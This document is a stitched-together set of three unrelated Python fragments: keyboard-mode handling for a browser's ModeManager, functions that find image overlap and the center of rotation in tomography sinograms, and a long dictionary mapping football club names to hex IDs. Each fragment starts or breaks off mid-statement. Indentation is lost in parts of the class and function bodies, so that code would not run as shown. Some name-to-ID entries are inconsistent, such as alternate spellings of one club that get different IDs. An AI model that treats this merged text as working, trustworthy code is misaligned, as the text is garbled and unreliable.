    Registers the ModeManager and HintManager in the window's object registry,
    builds one keyparser per KeyMode and registers each with the manager.

    Args:
        win_id: The ID of the window the manager belongs to.
        parent: The QObject parent for the created managers.

    Returns:
        The fully initialized ModeManager.
    """
    commandrunner = runners.CommandRunner(win_id)

    modeman = ModeManager(win_id, parent)
    objreg.register('mode-manager', modeman, scope='window', window=win_id)

    hintmanager = hints.HintManager(win_id, parent=parent)
    objreg.register('hintmanager', hintmanager, scope='window',
                    window=win_id, command_only=True)
    modeman.hintmanager = hintmanager

    # Keys typed in sensitive (passthrough) modes are only logged when the
    # debug flag explicitly asks for it.
    log_sensitive_keys = 'log-sensitive-keys' in objects.debug_flags

    def _command_parser(mode, **kwargs):
        """Build a CommandKeyParser for *mode* with the shared arguments."""
        return modeparsers.CommandKeyParser(
            mode=mode,
            win_id=win_id,
            commandrunner=commandrunner,
            parent=modeman,
            **kwargs)

    def _register_parser(mode):
        """Build a RegisterKeyParser for *mode* with the shared arguments."""
        return modeparsers.RegisterKeyParser(
            mode=mode,
            win_id=win_id,
            commandrunner=commandrunner,
            parent=modeman)

    keyparsers: ParserDictType = {
        usertypes.KeyMode.normal:
            modeparsers.NormalKeyParser(
                win_id=win_id,
                commandrunner=commandrunner,
                parent=modeman),
        usertypes.KeyMode.hint:
            modeparsers.HintKeyParser(
                win_id=win_id,
                commandrunner=commandrunner,
                hintmanager=hintmanager,
                parent=modeman),
        usertypes.KeyMode.insert:
            _command_parser(usertypes.KeyMode.insert, passthrough=True,
                            do_log=log_sensitive_keys, supports_count=False),
        usertypes.KeyMode.passthrough:
            _command_parser(usertypes.KeyMode.passthrough, passthrough=True,
                            do_log=log_sensitive_keys, supports_count=False),
        usertypes.KeyMode.command:
            _command_parser(usertypes.KeyMode.command, passthrough=True,
                            do_log=log_sensitive_keys, supports_count=False),
        usertypes.KeyMode.prompt:
            _command_parser(usertypes.KeyMode.prompt, passthrough=True,
                            do_log=log_sensitive_keys, supports_count=False),
        usertypes.KeyMode.yesno:
            _command_parser(usertypes.KeyMode.yesno, supports_count=False),
        usertypes.KeyMode.caret:
            _command_parser(usertypes.KeyMode.caret, passthrough=True),
        usertypes.KeyMode.set_mark:
            _register_parser(usertypes.KeyMode.set_mark),
        usertypes.KeyMode.jump_mark:
            _register_parser(usertypes.KeyMode.jump_mark),
        usertypes.KeyMode.record_macro:
            _register_parser(usertypes.KeyMode.record_macro),
        usertypes.KeyMode.run_macro:
            _register_parser(usertypes.KeyMode.run_macro),
    }

    for mode, parser in keyparsers.items():
        modeman.register(mode, parser)

    return modeman
def instance(win_id: Union[int, str]) -> 'ModeManager':
    """Get the ModeManager associated with the given window.

    Args:
        win_id: The ID of the window to look up.

    Return:
        The window's ModeManager.

    Raises:
        UnavailableError: If there is no instance available yet.
    """
    manager = objreg.get('mode-manager', scope='window', window=win_id,
                         default=None)
    if manager is None:
        raise UnavailableError("ModeManager is not initialized yet.")
    return manager
def enter(win_id: int,
          mode: usertypes.KeyMode,
          reason: str = None,
          only_if_normal: bool = False) -> None:
    """Enter the given mode in the given window.

    Convenience wrapper delegating to the window's ModeManager.
    """
    manager = instance(win_id)
    manager.enter(mode, reason=reason, only_if_normal=only_if_normal)
def leave(win_id: int,
          mode: usertypes.KeyMode,
          reason: str = None, *,
          maybe: bool = False) -> None:
    """Leave the given mode in the given window.

    Convenience wrapper delegating to the window's ModeManager.
    """
    manager = instance(win_id)
    manager.leave(mode, reason=reason, maybe=maybe)
class ModeManager(QObject):
"""Manager for keyboard modes.
Attributes:
mode: The mode we're currently in.
hintmanager: The HintManager associated with this window.
_win_id: The window ID of this ModeManager
_prev_mode: Mode before a prompt popped up
parsers: A dictionary of modes and their keyparsers.
_forward_unbound_keys: If we should forward unbound keys.
_releaseevents_to_pass: A set of KeyEvents where the keyPressEvent was
passed through, so the release event should as
well.
Signals:
entered: Emitted when a mode is entered.
arg1: The mode which has been entered.
arg2: The window ID of this mode manager.
left: Emitted when a mode is left.
arg1: The mode which has been left.
arg2: The new current mode.
arg3: The window ID of this mode manager.
keystring_updated: Emitted when the keystring was updated in any mode.
arg 1: The mode in which the keystring has been
updated.
arg 2: The new key string.
"""
entered = pyqtSignal(usertypes.KeyMode, int)
left = pyqtSignal(usertypes.KeyMode, usertypes.KeyMode, int)
keystring_updated = pyqtSignal(usertypes.KeyMode, str)
    def __init__(self, win_id: int, parent: QObject = None) -> None:
        """Initialize the manager in normal mode with no parsers registered.

        Args:
            win_id: The ID of the window this ModeManager belongs to.
            parent: The parent QObject.
        """
        super().__init__(parent)
        self._win_id = win_id
        # Filled via register(); maps each KeyMode to its keyparser.
        self.parsers: ParserDictType = {}
        # Mode to restore once a prompt mode is left.
        self._prev_mode = usertypes.KeyMode.normal
        self.mode = usertypes.KeyMode.normal
        # Key-press events which were passed through; the matching release
        # events should be passed through as well.
        self._releaseevents_to_pass: Set[KeyEvent] = set()
        # Set after __init__
        self.hintmanager = cast(hints.HintManager, None)
    def __repr__(self) -> str:
        """Show the current mode in the debug representation."""
        return utils.get_repr(self, mode=self.mode)
    def _handle_keypress(self, event: QKeyEvent, *,
                         dry_run: bool = False) -> bool:
        """Handle filtering of KeyPress events.

        Args:
            event: The KeyPress to examine.
            dry_run: Don't actually handle the key, only filter it.

        Return:
            True if event should be filtered, False otherwise.
        """
        curmode = self.mode
        parser = self.parsers[curmode]
        # Avoid logging in insert mode so typed (potentially sensitive) text
        # doesn't end up in the debug log.
        if curmode != usertypes.KeyMode.insert:
            log.modes.debug("got keypress in mode {} - delegating to {}".format(
                utils.pyenum_str(curmode), utils.qualname(parser)))
        match = parser.handle(event, dry_run=dry_run)
        # Shift alone isn't treated as a real modifier (it just produces
        # capitals/symbols).
        has_modifier = event.modifiers() not in [
            Qt.NoModifier,
            Qt.ShiftModifier,
        ]  # type: ignore[comparison-overlap]
        is_non_alnum = has_modifier or not event.text().strip()
        forward_unbound_keys = config.cache['input.forward_unbound_keys']
        if match:
            # The key was (part of) a binding: always consume it.
            filter_this = True
        elif (parser.passthrough or forward_unbound_keys == 'all' or
              (forward_unbound_keys == 'auto' and is_non_alnum)):
            filter_this = False
        else:
            filter_this = True
        if not filter_this and not dry_run:
            # Remember the event so the matching KeyRelease gets passed
            # through as well (see _handle_keyrelease).
            self._releaseevents_to_pass.add(KeyEvent.from_event(event))
        if curmode != usertypes.KeyMode.insert:
            focus_widget = objects.qapp.focusWidget()
            log.modes.debug("match: {}, forward_unbound_keys: {}, "
                            "passthrough: {}, is_non_alnum: {}, dry_run: {} "
                            "--> filter: {} (focused: {!r})".format(
                                match, forward_unbound_keys,
                                parser.passthrough, is_non_alnum, dry_run,
                                filter_this, focus_widget))
        return filter_this
def _handle_keyrelease(self, event: QKeyEvent) -> bool:
"""Handle filtering of KeyRelease events.
Args:
event: The KeyPress to examine.
Return:
True if event should be filtered, False otherwise.
"""
# handle like matching KeyPress
keyevent = KeyEvent.from_event(event)
if keyevent in self._releaseevents_to_pass:
self._releaseevents_to_pass.remove(keyevent)
filter_this = False
else:
filter_this = True
if self.mode != usertypes.KeyMode.insert:
log.modes.debug("filter: {}".format(filter_this))
return filter_this
def register(self, mode: usertypes.KeyMode,
parser: basekeyparser.BaseKeyParser) -> None:
"""Register a new mode."""
assert parser is not None
self.parsers[mode] = parser
parser.request_leave.connect(self.leave)
parser.keystring_updated.connect(
functools.partial(self.keystring_updated.emit, mode))
    def enter(self, mode: usertypes.KeyMode,
              reason: str = None,
              only_if_normal: bool = False) -> None:
        """Enter a new mode.

        Args:
            mode: The mode to enter as a KeyMode member.
            reason: Why the mode was entered.
            only_if_normal: Only enter the new mode if we're in normal mode.
        """
        # Entering normal mode is implemented as leaving the current mode.
        if mode == usertypes.KeyMode.normal:
            self.leave(self.mode, reason='enter normal: {}'.format(reason))
            return
        log.modes.debug("Entering mode {}{}".format(
            utils.pyenum_str(mode),
            '' if reason is None else ' (reason: {})'.format(reason)))
        if mode not in self.parsers:
            raise ValueError("No keyparser for mode {}".format(mode))
        # Re-entering the current mode, or switching between prompt modes,
        # is treated as a no-op.
        if self.mode == mode or (self.mode in PROMPT_MODES and
                                 mode in PROMPT_MODES):
            log.modes.debug("Ignoring request as we're in mode {} "
                            "already.".format(self.mode))
            return
        if self.mode != usertypes.KeyMode.normal:
            if only_if_normal:
                log.modes.debug("Ignoring request as we're in mode {} "
                                "and only_if_normal is set..".format(
                                    self.mode))
                return
            # Overriding a non-normal mode: emit left for the old mode first.
            log.modes.debug("Overriding mode {}.".format(self.mode))
            self.left.emit(self.mode, mode, self._win_id)
        # Remember which input mode to restore after a prompt pops up over
        # it; in all other cases fall back to normal mode afterwards.
        if mode in PROMPT_MODES and self.mode in INPUT_MODES:
            self._prev_mode = self.mode
        else:
            self._prev_mode = usertypes.KeyMode.normal
        self.mode = mode
        self.entered.emit(mode, self._win_id)
@cmdutils.register(instance='mode-manager', scope='window')
def mode_enter(self, mode: str) -> None:
"""Enter a key mode.
Args:
mode: The mode to enter. See `:help bindings.commands` for the
available modes, but note that hint/command/yesno/prompt mode
can't be entered manually.
"""
try:
m = usertypes.KeyMode[mode]
except KeyError:
raise cmdutils.CommandError("Mode {} does not exist!".format(mode))
if m in [usertypes.KeyMode.hint, usertypes.KeyMode.command,
usertypes.KeyMode.yesno, usertypes.KeyMode.prompt,
usertypes.KeyMode.register]:
raise cmdutils.CommandError(
"Mode {} can't be entered manually!".format(mode))
self.enter(m, 'command')
    @pyqtSlot(usertypes.KeyMode, str, bool)
    def leave(self, mode: usertypes.KeyMode,
              reason: str = None,
              maybe: bool = False) -> None:
        """Leave a key mode.

        Args:
            mode: The mode to leave as a usertypes.KeyMode member.
            reason: Why the mode was left.
            maybe: If set, ignore the request if we're not in that mode.
        """
        if self.mode != mode:
            if maybe:
                log.modes.debug("Ignoring leave request for {} (reason {}) as "
                                "we're in mode {}".format(
                                    mode, reason, self.mode))
                return
            else:
                raise NotInModeError("Not in mode {}!".format(mode))
        log.modes.debug("Leaving mode {}{}".format(
            utils.pyenum_str(mode),
            '' if reason is None else ' (reason: {})'.format(reason)))
        # leaving a mode implies clearing keychain, see
        # https://github.com/qutebrowser/qutebrowser/issues/1805
        self.clear_keychain()
        self.mode = usertypes.KeyMode.normal
        self.left.emit(mode, self.mode, self._win_id)
        # Leaving a prompt mode restores whatever mode the prompt interrupted
        # (saved in enter()).
        if mode in PROMPT_MODES:
            self.enter(self._prev_mode,
                       reason='restore mode before {}'.format(mode.name))
@cmdutils.register(instance='mode-manager',
not_modes=[usertypes.KeyMode.normal], scope='window')
def mode_leave(self) -> None:
"""Leave the mode we're currently in."""
if self.mode | |
2 * radi + 1), list1, 2)
list2 = list_metric[min_pos - 1:min_pos + 2]
(afact2, bfact2, _) = np.polyfit(
np.arange(min_pos - 1, min_pos + 2), list2, 2)
curvature = np.abs(afact1)
if afact2 != 0.0:
num = - bfact2 / (2 * afact2)
if (num >= min_pos - 1) and (num <= min_pos + 1):
min_pos = num
return curvature, np.float32(min_pos)
def correlation_metric(mat1, mat2):
    """
    Calculate the correlation metric. Smaller metric corresponds to better
    correlation.

    Parameters
    ----------
    mat1 : array_like
    mat2 : array_like

    Returns
    -------
    float
        Correlation metric.
    """
    # Flatten column-wise and map the Pearson coefficient r in [-1, 1] to a
    # metric |1 - r| in [0, 2] where 0 means perfect positive correlation.
    vec1 = mat1.flatten('F')
    vec2 = mat2.flatten('F')
    coefficient = stats.pearsonr(vec1, vec2)[0]
    return np.abs(1.0 - coefficient)
def search_overlap(mat1, mat2, win_width, side, denoise=True, norm=False,
                   use_overlap=False):
    """
    Calculate the correlation metrics between a rectangular region, defined
    by the window width, on the utmost left/right side of image 2 and the
    same size region in image 1 where the region is slided across image 1.

    Parameters
    ----------
    mat1 : array_like
        2D array. Projection image or sinogram image.
    mat2 : array_like
        2D array. Projection image or sinogram image.
    win_width : int
        Width of the searching window.
    side : {0, 1}
        Only two options: 0 or 1. It is used to indicate the overlap side
        respects to image 1. "0" corresponds to the left side. "1" corresponds
        to the right side.
    denoise : bool, optional
        Apply the Gaussian filter if True.
    norm : bool, optional
        Apply the normalization if True.
    use_overlap : bool, optional
        Use the combination of images in the overlap area for calculating
        correlation coefficients if True.

    Returns
    -------
    list_metric : array_like
        1D array. List of the correlation metrics.
    offset : int
        Initial position of the searching window where the position
        corresponds to the center of the window.
    """
    if denoise is True:
        # Light smoothing to suppress noise before correlating.
        mat1 = ndi.gaussian_filter(mat1, (2, 2), mode='reflect')
        mat2 = ndi.gaussian_filter(mat2, (2, 2), mode='reflect')
    (nrow1, ncol1) = mat1.shape
    (nrow2, ncol2) = mat2.shape
    if nrow1 != nrow2:
        raise ValueError("Two images are not at the same height!!!")
    # Clamp the window to a sensible size relative to both images.
    win_width = np.int16(np.clip(win_width, 6, min(ncol1, ncol2) // 2 - 1))
    offset = win_width // 2
    win_width = 2 * offset  # Make it even
    # Linear blending ramps used to combine both images in the overlap area.
    ramp_down = np.linspace(1.0, 0.0, win_width)
    ramp_up = 1.0 - ramp_down
    wei_down = np.tile(ramp_down, (nrow1, 1))
    wei_up = np.tile(ramp_up, (nrow1, 1))
    if side == 1:
        # Overlap on the right of image 1 -> fixed region is the left edge
        # of image 2; otherwise it is the right edge of image 2.
        mat2_roi = mat2[:, 0:win_width]
        mat2_roi_wei = mat2_roi * wei_up
    else:
        mat2_roi = mat2[:, ncol2 - win_width:]
        mat2_roi_wei = mat2_roi * wei_down
    list_mean2 = np.mean(np.abs(mat2_roi), axis=1)
    # Slide the window across image 1; each center position yields a metric.
    list_pos = np.arange(offset, ncol1 - offset)
    num_metric = len(list_pos)
    list_metric = np.ones(num_metric, dtype=np.float32)
    for i, pos in enumerate(list_pos):
        mat1_roi = mat1[:, pos - offset:pos + offset]
        if use_overlap is True:
            if side == 1:
                mat1_roi_wei = mat1_roi * wei_down
            else:
                mat1_roi_wei = mat1_roi * wei_up
        if norm is True:
            # Match the mean (row-wise) intensity of the image-1 window to
            # the fixed image-2 region.
            list_mean1 = np.mean(np.abs(mat1_roi), axis=1)
            list_fact = list_mean2 / list_mean1
            mat_fact = np.transpose(np.tile(list_fact, (win_width, 1)))
            mat1_roi = mat1_roi * mat_fact
            if use_overlap is True:
                mat1_roi_wei = mat1_roi_wei * mat_fact
        if use_overlap is True:
            # Average the metric over both images and their blended overlap.
            mat_comb = mat1_roi_wei + mat2_roi_wei
            list_metric[i] = (correlation_metric(mat1_roi, mat2_roi)
                              + correlation_metric(mat1_roi, mat_comb)
                              + correlation_metric(mat2_roi, mat_comb)) / 3.0
        else:
            list_metric[i] = correlation_metric(mat1_roi, mat2_roi)
    min_metric = np.min(list_metric)
    if min_metric != 0.0:
        # Normalize so the best (smallest) metric becomes 1.0.
        list_metric = list_metric / min_metric
    return list_metric, offset
def find_overlap(mat1, mat2, win_width, side=None, denoise=True, norm=False,
                 use_overlap=False):
    """
    Find the overlap area and overlap side between two images (Ref. [1]) where
    the overlap side referring to the first image.

    Parameters
    ----------
    mat1 : array_like
        2D array. Projection image or sinogram image.
    mat2 : array_like
        2D array. Projection image or sinogram image.
    win_width : int
        Width of the searching window.
    side : {None, 0, 1}, optional
        Only three options: None, 0, or 1. "None" corresponding to fully
        automated determination. "0" corresponding to the left side. "1"
        corresponding to the right side.
    denoise : bool, optional
        Apply the Gaussian filter if True.
    norm : bool, optional
        Apply the normalization if True.
    use_overlap : bool, optional
        Use the combination of images in the overlap area for calculating
        correlation coefficients if True.

    Returns
    -------
    overlap : float
        Width of the overlap area between two images.
    side : int
        Overlap side between two images.
    overlap_position : float
        Position of the window in the first image giving the best
        correlation metric.

    References
    ----------
    .. [1] https://doi.org/10.1364/OE.418448
    """
    (_, ncol1) = mat1.shape
    (_, ncol2) = mat2.shape
    win_width = np.int16(np.clip(win_width, 6, min(ncol1, ncol2) // 2))
    if side == 1:
        (list_metric, offset) = search_overlap(mat1, mat2, win_width, side,
                                               denoise, norm, use_overlap)
        (_, overlap_position) = calculate_curvature(list_metric)
        overlap_position = overlap_position + offset
        overlap = ncol1 - overlap_position + win_width // 2
    elif side == 0:
        (list_metric, offset) = search_overlap(mat1, mat2, win_width, side,
                                               denoise, norm, use_overlap)
        (_, overlap_position) = calculate_curvature(list_metric)
        overlap_position = overlap_position + offset
        overlap = overlap_position + win_width // 2
    else:
        # Automated side determination: try both sides and keep the one
        # whose metric curve has the sharper minimum (higher curvature).
        # Bug fix: `denoise` and `norm` were previously passed in swapped
        # order here, so this branch silently used different filter/
        # normalization settings than the explicit side == 0/1 branches.
        # The argument order now matches the
        # search_overlap(mat1, mat2, win_width, side, denoise, norm, ...)
        # signature.
        (list_metric1, offset1) = search_overlap(mat1, mat2, win_width, 1,
                                                 denoise, norm, use_overlap)
        (list_metric2, offset2) = search_overlap(mat1, mat2, win_width, 0,
                                                 denoise, norm, use_overlap)
        (curvature1, overlap_position1) = calculate_curvature(list_metric1)
        overlap_position1 = overlap_position1 + offset1
        (curvature2, overlap_position2) = calculate_curvature(list_metric2)
        overlap_position2 = overlap_position2 + offset2
        if curvature1 > curvature2:
            side = 1
            overlap_position = overlap_position1
            overlap = ncol1 - overlap_position + win_width // 2
        else:
            side = 0
            overlap_position = overlap_position2
            overlap = overlap_position + win_width // 2
    return overlap, side, overlap_position
def find_overlap_multiple(list_mat, win_width, side=None, denoise=True,
                          norm=False, use_overlap=False):
    """
    Find the overlap-areas and overlap-sides of a list of images where the
    overlap side referring to the previous image.

    Parameters
    ----------
    list_mat : list of array_like
        List of 2D array. Projection image or sinogram image.
    win_width : int
        Width of the searching window.
    side : {None, 0, 1}, optional
        Only three options: None, 0, or 1. "None" corresponding to fully
        automated determination. "0" corresponding to the left side. "1"
        corresponding to the right side.
    denoise : bool, optional
        Apply the Gaussian filter if True.
    norm : bool, optional
        Apply the normalization if True.
    use_overlap : bool, optional
        Use the combination of images in the overlap area for calculating
        correlation coefficients if True.

    Returns
    -------
    list_overlap : list of tuple of floats
        List of [overlap, side, overlap_position].
        overlap : Width of the overlap area between two images.
        side : Overlap side between two images.
        overlap_position : Position of the window in the first
        image giving the best correlation metric.
    """
    if len(list_mat) < 2:
        raise ValueError("Need at least 2 images to work!!!")
    # One result per consecutive pair of images.
    return [find_overlap(mat_cur, mat_next, win_width, side, denoise, norm,
                         use_overlap)
            for mat_cur, mat_next in zip(list_mat, list_mat[1:])]
def find_center_360(sino_360, win_width, side=None, denoise=True, norm=False,
                    use_overlap=False):
    """
    Find the center-of-rotation (COR) in a 360-degree scan with offset COR use
    the method presented in Ref. [1].

    Parameters
    ----------
    sino_360 : array_like
        2D array. 360-degree sinogram.
    win_width : int
        Window width used for finding the overlap area.
    side : {None, 0, 1}, optional
        Overlap side. Only three options: None, 0, or 1. "None" corresponding
        to fully automated determination. "0" corresponding to the left side.
        "1" corresponding to the right side.
    denoise : bool, optional
        Apply the Gaussian filter if True.
    norm : bool, optional
        Apply the normalization if True.
    use_overlap : bool, optional
        Use the combination of images in the overlap area for calculating
        correlation coefficients if True.

    Returns
    -------
    cor : float
        Center-of-rotation.
    overlap : float
        Width of the overlap area between two halves of the sinogram.
    side : int
        Overlap side between two halves of the sinogram.
    overlap_position : float
        Position of the window in the first image giving the best
        correlation metric.

    References
    ----------
    .. [1] https://doi.org/10.1364/OE.418448
    """
    nrow, ncol = sino_360.shape
    half_height = nrow // 2 + 1
    # The second half of a 360-degree scan is the mirrored view of the first
    # half, so flip it before looking for the overlap.
    top_half = sino_360[:half_height, :]
    bottom_half = np.fliplr(sino_360[-half_height:, :])
    overlap, side, overlap_position = find_overlap(
        top_half, bottom_half, win_width, side, denoise, norm, use_overlap)
    cor = (overlap / 2.0 - 1.0) if side == 0 \
        else (ncol - overlap / 2.0 - 1.0)
    return cor, overlap, side, overlap_position
def complex_gradient(mat):
"""
Return complex gradient of a 2D array.
"""
mat1a = np.roll(mat, -2, axis=1)
mat2a = mat1a - mat
mat2a[:, :2] = | |
u19': '3755f67e',
'sc hauenstein': '3e994daf',
'sc paderborn 07': 'd9f93f02',
'paderborn 07': 'd9f93f02',
'sc paderborn 07 u17': '6df34a06',
'sc paderborn 07 u19': 'd9f72365',
'sc preußen 06 münster u17': '9d619fa8',
'sc preussen 06 munster u17': '9d619fa8',
'sc preußen 06 münster u19': '21499441',
'sc preussen 06 munster u19': '21499441',
'sc preußen münster': 'bbcef8c7',
'preussen munster': 'bbcef8c7',
'sc rot-weiß oberhausen u19': '23ced855',
'sc rot weiss oberhausen u19': '23ced855',
'sc sand': '0cc34cf4',
'sand': '0cc34cf4',
'sc verl': '131bc303',
'sc weiche flensburg 08': 'b979b61c',
'sg 99 andernach': '62006b94',
'sg dynamo dresden u17': '4e32ce87',
'sg dynamo dresden u19': 'e7f2df64',
'sg sonnenhof großaspach': 'a5e62940',
'sonnenhof grossaspach': 'a5e62940',
'sg unterrath u17': 'c7038b7d',
'sg wattenscheid 09': '6f7db76a',
'sgs essen': 'becc1dd0',
'essen': 'becc1dd0',
'sportfreunde dorfmerkingen': 'cf68b22f',
'sportfreunde lotte': '1573023f',
'sportfreunde siegen': '405a2854',
'spvg berghofen': 'b4b4ac38',
'spvgg greuther fürth': '12192a4c',
'greuther furth': '12192a4c',
'spvgg greuther fürth 1903 u17': '7880a87b',
'spvgg greuther furth 1903 u17': '7880a87b',
'spvgg greuther fürth 1903 u19': '5af9af80',
'spvgg greuther furth 1903 u19': '5af9af80',
'spvgg unterhaching': 'ba68a0c5',
'unterhaching': 'ba68a0c5',
'spvgg unterhaching u17': 'c1893176',
'spvgg unterhaching u19': 'ec68d97a',
'ssv jahn regensburg': '5cb328f2',
'jahn regensburg': '5cb328f2',
'ssv jeddeloh': '8f440eed',
'ssv reutlingen 05': '9cc4f801',
'ssv ulm 1846': '291257b3',
'ulm 1846': '291257b3',
'ssv ulm 1846 u17': 'd59864e1',
'ssv ulm 1846 u19': 'ce50e2f4',
'stuttgarter kickers': 'ee8f53af',
'sv 07 elversberg u17': '19661cac',
'sv 67 weinberg': '5bf4fa86',
'sv alemannia waldalgesheim': 'eca78ff6',
'sv atlas delmenhorst': 'b4043eb2',
'sv babelsberg 03': 'e28cb2a4',
'babelsberg 03': 'e28cb2a4',
'sv darmstadt 98': '6a6967fc',
'darmstadt 98': '6a6967fc',
'sv darmstadt 98 u17': '61fca1ee',
'sv darmstadt 98 u19': 'e3ab73b4',
'sv drochtersen/assel': 'a6882ace',
'sv drochtersenassel': 'a6882ace',
'sv eichede': '5ac21fc8',
'sv eintracht trier 05': '041d5c51',
'eintracht trier': '041d5c51',
'sv elversberg': 'fe686760',
'elversberg': 'fe686760',
'sv göttelborn': 'ad5c423d',
'sv gottelborn': 'ad5c423d',
'sv hegnach': 'e14d6baf',
'sv holzbach': '11a6ae86',
'sv linx': '2cca410b',
'sv meppen': '93e94415',
'meppen': '93e94415',
'sv morlautern': '59f8532f',
'sv rödinghausen': 'f7b1bcce',
'sv rodinghausen': 'f7b1bcce',
'sv rödinghausen u19': '4a929269',
'sv rodinghausen u19': '4a929269',
'sv sandhausen': 'c241ee1a',
'sandhausen': 'c241ee1a',
'sv sandhausen 1916 u17': 'f5337a87',
'sv stuttgarter kickers u17': 'f73b15cf',
'sv stuttgarter kickers u19': 'b638db7a',
'sv wacker burghausen': '3ec823ca',
'wacker burghausen': '3ec823ca',
'sv waldhof mannheim': '151d706e',
'sv waldkirch': 'd38e4870',
'sv wehen wiesbaden': '432f2430',
'wehen wiesbaden': '432f2430',
'sv wehen wiesbaden u17': 'ce01ae4e',
'sv wehen wiesbaden u19': 'd45eb7dc',
'sv werder bremen': '7adbf480',
'werder bremen': '7adbf480',
'sv werder bremen ii': '27020d71',
'werder bremen ii': '27020d71',
'sv werder bremen u17': '454cd859',
'sv werder bremen u19': '9811e0ce',
'tennis borussia berlin u17': 'ffc956ac',
'tsg 1881 sprockhövel u19': 'f858aad6',
'tsg 1881 sprockhovel u19': 'f858aad6',
'tsg 1899 hoffenheim': '033ea6b8',
'hoffenheim': '87705c62',
'tsg 1899 hoffenheim frauen': '87705c62',
'tsg 1899 hoffenheim u17': '6de8c4a5',
'tsg 1899 hoffenheim u19': '0d978394',
'tsv 1860 münchen': '2fbdf057',
'1860 munich': '2fbdf057',
'tsv 1860 münchen u17': '94c74217',
'tsv 1860 munchen u17': '94c74217',
'tsv 1860 münchen u19': 'e16a2df0',
'tsv 1860 munchen u19': 'e16a2df0',
'tsv fortuna 95 düsseldorf u17': '5d67715c',
'tsv fortuna 95 dusseldorf u17': '5d67715c',
'tsv fortuna 95 düsseldorf u19': 'e2bede9e',
'tsv fortuna 95 dusseldorf u19': 'e2bede9e',
'tsv steinbach': 'e17dbcf6',
'tus dassendorf': '4cb3a7df',
'tus erndtebrück': 'c6ed9aad',
'tus erndtebruck': 'c6ed9aad',
'tus koblenz': 'b90ae239',
'koblenz': 'b90ae239',
'tus rot-weiß koblenz': '152320d0',
'tus rot weiss koblenz': '152320d0',
'tus schwachhausen': '3a7a5f05',
'tus wörrstadt': 'aa5142ce',
'tus worrstadt': 'aa5142ce',
'usc paloma': '2ec979d4',
'vfb eichstätt': '90d37df2',
'vfb eichstatt': '90d37df2',
'vfb germania halberstadt': '8c6d7dee',
'vfb lübeck': '57ea79cd',
'lubeck': '57ea79cd',
'vfb stuttgart': '598bc722',
'stuttgart': '598bc722',
'vfb stuttgart ii': '2959ee71',
'stuttgart ii': '2959ee71',
'vfb stuttgart u17': 'f516c444',
'vfb stuttgart u19': '6928de6d',
'vfl bochum': 'b42c6323',
'bochum': 'b42c6323',
'vfl bochum 1848 u17': '37a68655',
'vfl bochum 1848 u19': '5f0284ea',
'vfl osnabrück': '3ce4e72c',
'osnabruck': '3ce4e72c',
'vfl osnabrück u19': 'a036ca44',
'vfl osnabruck u19': 'a036ca44',
'vfl wolfsburg': 'a1393014',
'wolfsburg': 'a1393014',
'vfl wolfsburg u17': 'aabd9798',
'vfl wolfsburg u19': '4f4b03ee',
'vfr aalen': 'eb207015',
'aalen': 'eb207015',
'walddörfer sv': 'd45bef5d',
'walddorfer sv': 'd45bef5d',
'wormatia worms': '0ac19e63',
'wuppertaler sv': '864e4c89',
'wuppertaler': '864e4c89',
'wuppertaler sv u17': '05111478',
'wuppertaler sv u19': 'ff6f8fac',
'würzburger kickers': '4c2b6cd7',
'wurzburger kickers': '4c2b6cd7',
'europa': '75cd4ee3',
'lincoln red imps': '2d3c1b6d',
"st. joseph's": 'bb780485',
'st josephs': 'bb780485',
'<NAME>': '9478ac3f',
'larissa': '9478ac3f',
'aek athens': 'd5348c80',
'<NAME>': '4f49b6c8',
'akratitos': '35896cb2',
'amazones dramas': '235ba9cc',
'aok kerkyra': '4a3e2e72',
'kerkyra': '4a3e2e72',
'apollon pontou': 'd1892beb',
'apollon smyrni': 'e205e89a',
'aris thessaloniki': 'edddfa63',
'aris': 'edddfa63',
'asteras tripoli': 'd884c383',
'athinaikos': '90cf7406',
'atromitos': 'c9607f44',
'chalkidona': '21a657ba',
'doxa drama': '5db4600d',
'egaleo': '9b1d00dc',
'elpides karditsas': '11864fb0',
'ergotelis': '65e32bbe',
'ethnikos asteras': '430a9acb',
'ionikos': 'cba90a8e',
'iraklis thessaloniki': 'fd5c91e2',
'kalamata': '43741223',
'kallithea': '231a223e',
'kavala': '42b3181c',
'levadiakos': '2fb7213e',
'niki volos': '295b8c9d',
'ofi crete': '80b1ef30',
'olympiacos': '2fdb4aef',
'olympiacos volou 1937': '147dfe83',
'olympiacos volou': '147dfe83',
'panachaiki': '88b99a6a',
'panathinaikos': 'f3a5726c',
'panetolikos': '6fc21c65',
'paniliakos': 'd0a46fad',
'panionios': '1ad6cc2c',
'panserraikos': '31b8553d',
'panthrakikos': '5c3a0304',
'paok': '1b3af73b',
'paok wf': '1b3af73b',
'pas giannina': '6507d2b8',
'pas lamia 1964': '890cfc60',
'pas lamia': '890cfc60',
'platanias': '98f7f8ec',
'proodeftiki': 'e81ed996',
'thrasyvoulos': '57032e88',
'veria': '5e71893d',
'volos n.f.c.': '4a2c27a3',
'volos nfc': '4a2c27a3',
'xanthi': 'fdaa51b4',
'asc le siroco': '635b7f12',
'phare du canal': '131b6d6f',
'unité sainte-rosienne': 'abdf207a',
'unite sainte rosienne': 'abdf207a',
'balmazújvárosi': 'c2dbad3b',
'balmazujvaros': 'c2dbad3b',
'békéscsaba 1912 előre se': '542426e5',
'bekescsaba': '542426e5',
'bsiófok': '1c2a42f8',
'siofok': '1c2a42f8',
'budapest honvéd': '8cac5dfa',
'honved': '8cac5dfa',
'debreceni vsc': 'e24ac92e',
'debrecen': 'e24ac92e',
'diósgyőri vtk': 'e4babb95',
'diosgyor': 'e4babb95',
'dunaújváros': '17956b6e',
'dunaujvaros': '173a9410',
'dunaújváros pase': '173a9410',
'egri': '79c71c79',
'eger': '79c71c79',
'sopron': '13437197',
'tatabánya': 'd1db919f',
'tatabanya': 'd1db919f',
'ferencvárosi tc': 'fd573be7',
'ferencvaros': 'fd573be7',
'gyirmót győr': 'e0cc29a7',
'gyirmot': 'e0cc29a7',
'győri eto': '4149e9fd',
'gyor': '4149e9fd',
'kaposvári rákóczi': 'cf01a01d',
'kaposvar': 'cf01a01d',
'kecskeméti te': 'e56b19e1',
'kecskemet': 'e56b19e1',
'kisvárda': '2f78fc78',
'kisvarda': '2f78fc78',
'mezőkövesdi se': 'cab13f30',
'mezokovesd': 'cab13f30',
'mol fehérvár': 'a338349f',
'fehervar': 'a338349f',
'mtk budapest': 'e44db2c6',
'mtk hungária': 'fd1a6b48',
'mtk hungaria': 'fd1a6b48',
'nyíregyháza spartacus': '44c4d76e',
'nyiregyhaza': '44c4d76e',
'paksi': 'db2b616c',
'paks': 'db2b616c',
'pápai': '342a7523',
'papa': '342a7523',
